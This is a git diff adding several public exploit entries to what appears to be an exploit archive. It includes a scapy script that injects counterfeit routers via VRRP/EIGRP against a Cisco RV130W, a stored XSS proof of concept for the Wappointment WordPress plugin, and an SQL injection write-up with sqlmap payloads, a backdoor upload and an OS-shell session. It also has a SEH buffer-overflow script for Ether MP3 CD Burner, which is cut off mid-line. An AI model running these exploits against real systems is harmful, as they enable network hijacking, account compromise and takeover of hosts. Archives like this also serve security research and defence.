diff --git a/exploits/hardware/remote/50335.py b/exploits/hardware/remote/50335.py
new file mode 100755
index 000000000..94a8183a2
--- /dev/null
+++ b/exploits/hardware/remote/50335.py
@@ -0,0 +1,76 @@
+# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
+# Date: 24/09/2021
+# Exploit Author: Michael Alamoot
+# Vendor Homepage: https://www.cisco.com/
+# Version: RV130W 1.0.3.44
+# Tested on: Kali linux
+
+#! /usr/bin/env python3
+from scapy.contrib.eigrp import EIGRPAuthData
+from scapy.contrib.eigrp import EIGRPIntRoute
+from scapy.contrib.eigrp import EIGRPGeneric
+from scapy.contrib.eigrp import EIGRPSeq
+from scapy.contrib.eigrp import EIGRP
+from scapy.layers.vrrp import VRRPv3
+from scapy.layers.vrrp import VRRP
+from scapy.layers.l2 import Ether
+from scapy.layers.inet import IP
+from scapy.sendrecv import sendp
+from scapy.volatile import RandMAC
+from scapy.all import conf
+import socket,networkx,os
+import argparse,sys,asyncio
+
+class argX:
+ def __init__(self):
+ self.parser = argparse.ArgumentParser(description="...")
+ self.parser.add_argument(
+ "-i","--ip",
+ help="ip router fake injection",
+ dest="ip",
+ )
+ self.parser.add_argument(
+ "-r","--ip-router",
+ help="ip router root",
+ dest="router",
+ default=conf.route.route('0.0.0.0')[2]
+ )
+
+ def argvX(self):
+ """ [0] ip-router [1] ip-fake """
+ args = self.parser.parse_args()
+ ip = args.ip
+ route = args.router
+ return [ip,route]
+
+
+class exploit(object):
+
+ def __new__(cls,*args,**kwargs):
+ return super(exploit,cls).__new__(cls)
+
+ def __init__(self,IProuter,InjectFackeRouter):
+ self.IProuter = IProuter
+ self.InjectFackeRouter = InjectFackeRouter
+ self.MAC = RandMAC()
+
+ def pyload(self):
+ pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\
+ /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\
+ /IP(src=self.IProuter,dst="224.0.0.10") \
+ /EIGRP(opcode="Update",asn=100,seq=0,ack=0
+ ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])
+ return pyload
+
+ def start(self,count=[0,100]):
+ for i in range(count[0],count[1]):
+ sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)
+ print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")
+
+if __name__ == "__main__":
+ a = argX().argvX()
+ if a[0]:
+ net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])
+ net1.start()
+ else:
+ print("[-h] [--help]")
\ No newline at end of file
diff --git a/exploits/php/webapps/50316.py b/exploits/php/webapps/50316.py
index 5c30a7b29..45ed3743c 100755
--- a/exploits/php/webapps/50316.py
+++ b/exploits/php/webapps/50316.py
@@ -74,8 +74,9 @@ class CVE_2019_13358:
try:
request = requests.get(self.args.url, params=params)
- except:
- raise Exception("Failed to GET to the URL provided")
+ except Exception as e:
+
+ raise Exception("Failed to GET to the URL provided", e)
id = re.search(r"ID=([0-9])*", request.text)
diff --git a/exploits/php/webapps/50333.txt b/exploits/php/webapps/50333.txt
new file mode 100644
index 000000000..3cc5fcb44
--- /dev/null
+++ b/exploits/php/webapps/50333.txt
@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
+# Date: 2021-07-31
+# Exploit Author: Renos Nikolaou
+# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
+# Version: 2.2.4
+# Tested on: Windows
+# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities
+# because it fails to properly sanitize user-supplied input.
+
+# PoC - Stored XSS - Parameter: name
+# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
+# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
+# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname">
+# 4) Click Confirm
+# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )
+
+
+# Post Request (Step 4):
+
+POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
+Host: domain.com
+Content-Length: 205
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Content-Type: application/json
+Origin: http://domain.com
+Referer: http://domain.com/wordpress/booking-page/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+{"email":"testemail@testemail.com","name":"testname\">
","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
\ No newline at end of file
diff --git a/exploits/php/webapps/50334.txt b/exploits/php/webapps/50334.txt
new file mode 100644
index 000000000..b6b187d01
--- /dev/null
+++ b/exploits/php/webapps/50334.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated)
+# Google Dork: intitle: "Library System by YahooBaba"
+# Date: 26/08/2021
+# Exploit Author: Vinay Bhuria
+# Vendor Homepage: https://www.yahoobaba.net
+# Software Link: https://www.yahoobaba.net/project/library-system-in-php
+# Version: v1.0
+# Tested on: Windows
+
+Description:
+
+The Library System 1.0 application from Yahoobaba is vulnerable to
+SQL injection via the 'student_id' parameter on the student.php page.
+
+==================== 1. SQLi ====================
+
+http://localhost:8081/library-system/student.php
+
+The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+POST parameter 'student_id' is vulnerable.
+
+step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool.
+step 2 : Now copy the post request and save it as test.txt file.
+step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell"
+
+----------------------------------------------------------------------
+Parameter: student_id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: student_id=14 AND 9655=9655
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- -
+
+[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php
+[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'desktop-Vinay\vinay'
\ No newline at end of file
diff --git a/exploits/windows/local/50332.py b/exploits/windows/local/50332.py
new file mode 100755
index 000000000..a6c9424e7
--- /dev/null
+++ b/exploits/windows/local/50332.py
@@ -0,0 +1,66 @@
+# Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)
+# Date: 24.09.2021
+# Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2
+# Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe
+# Exploit Author: Achilles
+# Tested Version: 1.3.8
+# Tested on: Windows 7 64bit
+
+# 1.- Run python code : Ether_MP3_CD_Burner.py
+# 2.- Open EVIL.txt and copy All content to Clipboard
+# 3.- Open Ether_MP3_CD_Burner and press Register
+# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
+# 5.- Click 'OK'
+# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 1008
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh = struct.pack('